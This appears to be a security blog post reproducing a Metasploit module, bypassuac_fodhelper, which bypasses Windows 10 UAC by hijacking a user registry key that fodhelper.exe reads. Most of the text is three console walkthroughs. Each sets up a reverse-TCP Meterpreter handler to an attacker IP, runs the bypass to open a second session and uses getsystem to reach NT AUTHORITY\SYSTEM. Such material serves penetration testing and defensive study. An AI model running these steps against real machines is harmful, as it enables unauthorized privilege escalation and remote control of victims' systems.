Windows 10 Bypassuac fodhelper module
by do son · Published · Updated
exploit/windows/local/bypassuac_fodhelper module
This module will bypass Windows 10 UAC by hijacking a special key in the Registry under the current user hive, and inserting a custom command that will get invoked when the Windows fodhelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. This module modifies a registry key, but cleans up the key once the payload has been invoked. The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
Windows 10×86
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x86_IP>:49423) at 2017-06-01 10:02:18 -0500
meterpreter > sysinfo
Computer : DESKTOP-GS5CHPG
OS : Windows 10 (Build 10240).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options
Module options (exploit/windows/local/bypassuac_fodhelper):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x86_IP>:49424) at 2017-06-01 10:03:28 -0500
[*] Cleaining up registry keys ...
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : DESKTOP-GS5CHPG
OS : Windows 10 (Build 10240).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >
Windows 10×64 With x86 payload
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49422) at 2017-06-01 10:05:04 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options
Module options (exploit/windows/local/bypassuac_fodhelper):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Exploit target:
Id Name
-- ----
0 Windows x86
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49423) at 2017-06-01 10:06:02 -0500
[*] Cleaining up registry keys ...
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 10×64 with x64 payload
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST <MSF_IP> yes The listen address
LPORT 4567 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > run
[*] Started reverse TCP handler on <MSF_IP>:4567
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49424) at 2017-06-01 10:07:48 -0500
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuyid
[-] Unknown command: getuyid.
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run
[*] Started reverse TCP handler on <MSF_IP>:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49425) at 2017-06-01 10:08:41 -0500
[*] Cleaining up registry keys ...
meterpreter > sysinfo
Computer : DESKTOP-AI9785J
OS : Windows 10 (Build 10240).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Source: Github
